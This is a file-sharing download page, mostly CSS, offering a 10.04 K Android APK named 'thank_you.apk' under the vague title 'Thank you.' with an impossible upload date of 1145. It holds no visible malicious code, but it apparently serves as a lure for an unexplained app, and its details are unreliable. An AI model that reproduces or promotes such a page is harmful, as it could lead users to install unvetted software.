<html><head>



<title>Thank you.</title>

<meta name="description" content="Filesize£º10.04K|"></head>



<body>
<style>
::-webkit-scrollbar{background:rgba(0,0,0,0.01);height: 6px;width:6px}::-webkit-scrollbar-thumb{background-color:rgba(0,0,0,0.1)}::-webkit-scrollbar-thumb:hover {background:rgba(0,0,0,0.5);}
::-webkit-scrollbar-track{background: #f0f0f0;border-radius: 10px;}
::-webkit-scrollbar-thumb{border-radius: 10px;background-color: #c5c5c5;}
body{font: 14px Arial,\5FAE\8F6F\96C5\9ED1,sans-serif;margin: auto;color: #333;}
a{text-decoration: none;color: #111;}
a:hover{color: #FF3311;}
.n_hd{  height: 30px;padding: 10px;border-bottom: 1px solid #eee;position: fixed;background: rgba(255, 255, 255, .9);z-index: 8;right: 0;left: 0;}
.n_hd a{-webkit-transition: 0.1s;float: right;border-radius: 3px;}
.n_hd a:hover{opacity: .7;}
.user-ico{float: left;min-width: 300px;text-align: left;line-height: 30px;}
.user-name{color:#ff6740;margin-left: 10px;}
.user-name-txt{margin-left: 10px;}
.user-ico-img{width: 30px;height: 30px;border-radius: 50%;position: absolute;}
.user-ico-div{background: #bbb;width: 30px;height: 25px;border-radius: 50%;padding-top: 5px;float: left;}
.user-ico-div-1{background: #777;width: 10px;height: 10px;border-radius: 50%;margin: auto;}
.user-ico-div-2{background: #777;width: 20px;height: 10px;border-radius: 50%;margin: auto;margin-top: 1px;}
.n_login{background: #ffd1c5;padding: 0px 12px;font-size: 12px;    line-height: 30px;}
.n_login font{color: #fff;}
.n_box{width: 593px;margin-right: auto;margin-left: auto;height: auto;padding-top: 150px;}
.n_box_ico{border-radius: 10px;width: 100px;height: 100px;margin: auto;}
.n_box_ico img{border-radius: 20px;    width: 100%;}
.n_file_info{text-align: center;color: #888;    padding-bottom: 30px;}
.n_file_infos{margin-left: 10px;}
.n_box_fn{font-size: 26px;text-align: center;padding: 26px 0px 5px 0px;}
.n_box_2fn{font-size: 26px;text-align: center;padding: 26px 0px 5px 0px;}
.n_box_des{padding: 30px 0;margin: auto;line-height: 30px;min-height: 100px;font-size: 16px;}
.n_box_3fn{font-size: 26px;text-align: center;padding: 26px 0px 5px 0px;}
.n_file{background: #e1e7ea;font-size: 12px;width: 200px;border-radius: 50px;height: 40px;line-height: 40px;margin: auto;padding: 0 20px;}
.n_filesize{position: absolute;}
.n_downlink{position: absolute;height: 34px;width: 300px;margin-top: 4px;z-index: 9;}
.n_bot{background: #f7f7f7;text-align: center;padding: 50px;}
#code{margin: auto;width: 190px;margin-top: 30px;}
.n_foot{font-size: 12px;color: #999;padding: 20px;text-align: center;background: #f7f7f7;}
.n_copy{}
#downajax{text-align: center;float: right;padding: 5px 0;}
#downajax a{background: #0af;box-shadow: 0 1px 1px rgba(0,0,0,.15);color: #fff;text-decoration: none;display: block;width: 50px;text-align: center;border-radius: 50px;font-size: 14px;height: 30px;line-height: 30px;}
#downajax a:hover{background: #0377ff;}
#downajax a:active{box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.25);}
#passwddiv{position: fixed;background: #fff;background: rgba(255, 255, 255, .96);width: 100%;height: 100%;top: 0;bottom: 0;z-index: 99;}
.passwddiv-center{width: 300px;height: 300px;position: absolute;bottom: 50%;margin-bottom: -100px;left: 50%;margin-left: -150px;}
.passwddiv-userico{margin: auto;width: 90px;}
.passwddiv-userico-img{width: 90px;height: 90px;border-radius: 50%;position: absolute;}
.passwddiv-userico-0{background: #e9edef;width: 90px;height: 75px;border-radius: 50%;padding-top: 15px;}
.passwddiv-userico-1{background: #fff;width: 30px;height: 30px;border-radius: 50%;margin: auto;}
.passwddiv-userico-2{background: #fff;width: 59px;height: 26px;border-radius: 50%;margin: auto;margin-top: 3px;}
.passwddiv-user{text-align: center;margin-top: 20px;}
.passwddiv-user span{color: #000000;padding: 0 5px;}
.passwddiv-input{width: 200px;margin: auto;padding:10px;border-radius:5px;margin-top: 20px;background: #e9edef;}
.passwddiv-input:hover{background: #e1e7ea;}
.passwdinput{font-size: 14px;border: 0;background: #e9edef;background: #ffffff\9;line-height: 30px;height: 30px;outline: 0;padding: 0;text-indent: 5px;width: 160px;}
.passwdinput:focus{background: #e1e7ea;}
.passwddiv-btn{width: 30px;height: 30px;background: #0af;box-shadow: 0 1px 1px rgba(0,0,0,.15);border-radius: 50%;float: right;cursor: pointer;}
.passwddiv-btn:hover{background: #0377ff;}
.passwddiv-btn:active{box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.25);}
.passwddiv-btn-1{border-bottom: 1px solid #fff;width: 15px;margin-top: 14px;margin-left: 6px;}
.passwddiv-btn-2{border-bottom: 1px solid #fff;border-right: 1px solid #fff;width: 10px;height: 10px;transform: rotate(-45deg);margin-top: -6px;margin-left: 8px;}
#info{text-align:center;padding-top: 10px;}
.n_box_des{display:none}
.filter{filter: blur(5px);}
</style><div id="file" class=""><div class="n_hd"><div class="user-ico"><div class="user-ico-div"><div class="user-ico-div-1"></div><div class="user-ico-div-2"></div></div>




<span class="user-name">Thank you.</span><span class="user-name-txt">shared documents.</span></div></div><div class="n_box"><div class="n_box_ico"><span class="filename">

<img src="./apk.png"></span></div>

<div class="n_box_3fn" id="filenajax">Thank you.</div><div class="n_file_info">

<span class="n_file_infos">January 14th,1145 19:19:8.10</span>

<span class="n_file_infos">Android APK</span></div><div class="n_file">

<div class="n_filesize">Size: 10.04 K</div><div id="downajax"><a href="./thank_you.apk" target="_blank" rel="noreferrer">Download</a></div></div></div></div></body></html>
